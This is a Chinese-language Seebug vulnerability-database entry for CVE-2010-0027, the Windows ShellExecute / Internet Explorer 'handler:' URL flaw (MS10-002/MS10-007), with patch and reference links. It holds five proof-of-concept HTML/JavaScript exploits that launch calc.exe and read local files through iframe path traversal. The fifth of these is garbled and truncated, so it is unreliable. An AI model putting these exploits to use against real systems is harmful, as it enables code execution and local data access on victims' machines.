Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19146
HistoryFeb 20, 2010 - 12:00 a.m.

Microsoft Windows ShellExecute()输入验证漏洞(MS10-002/MS10-007)

2010-02-2000:00:00
Root
www.seebug.org
42

0.96 High

EPSS

Percentile

99.3%

JSON

BUGTRAQ ID: 37884
CVE ID: CVE-2010-0027

Microsoft Windows是微软发布的非常流行的操作系统。

IE浏览器等应用使用ShellExecute API函数处理文件。由于没有正确的对数据流执行验证,用户受骗跟随了恶意URL就可能导致绕过安全过滤执行本地系统上的二进制程序。

Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 2000SP4
厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS10-002)以及相应补丁:
MS10-002:Cumulative Security Update for Internet Explorer (978207)
链接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true


                                                ############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################

############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>

############# EOF #################

############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########


############# PoC four ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);

content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>

</body>
</html>

##################### EOF #############################


########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(??GET??,
??handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms??,
true);
req.send(?

Related

securityvulns 5
nessus 2
openvas 4
checkpoint_advisories 1
cve 1
prion 1
packetstorm 1
zdi 1
mskb 1
securityvulns
securityvulns
ZDI-10-016: Microsoft Windows ShellExecute Improper Sanitization Code Execution Vulnerability
2010-02-10 00:00:00
Microsoft Windows code execution
2010-02-17 00:00:00
Microsoft Security Bulletin MS10-007 - Critical Vulnerability in Windows Shell Handler Could Allow Remote Code Execution (975713)
2010-02-10 00:00:00
nessus
nessus
MS10-007: Vulnerability in Windows Shell Handler Could Allow Remote Code Execution (975713)
2010-02-09 00:00:00
MS10-002: Cumulative Security Update for Internet Explorer (978207)
2009-01-21 00:00:00
openvas
openvas
Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713)
2010-02-10 00:00:00
Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713)
2010-02-10 00:00:00
Microsoft Internet Explorer Multiple Vulnerabilities (978207)
2010-01-22 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Windows Shell Handler URL Validation Code Execution (MS10-007; CVE-2010-0027)
2010-02-09 00:00:00
cve
cve
CVE-2010-0027
2010-01-22 22:00:00
prion
prion
Input validation
2010-01-22 22:00:00
packetstorm
packetstorm
Internet Explorer 7 / 8 URL Validation
2010-02-10 00:00:00
zdi
zdi
Microsoft Windows ShellExecute Improper Sanitization Code Execution Vulnerability
2010-02-09 00:00:00
mskb
mskb
MS10-002: Cumulative security update for Internet Explorer
2014-06-23 07:27:25

0.96 High

EPSS

Percentile

99.3%

JSON
Related for SSV:19146
securityvulns5nessus2openvas4checkpoint_advisories1cve1prion1packetstorm1zdi1mskb1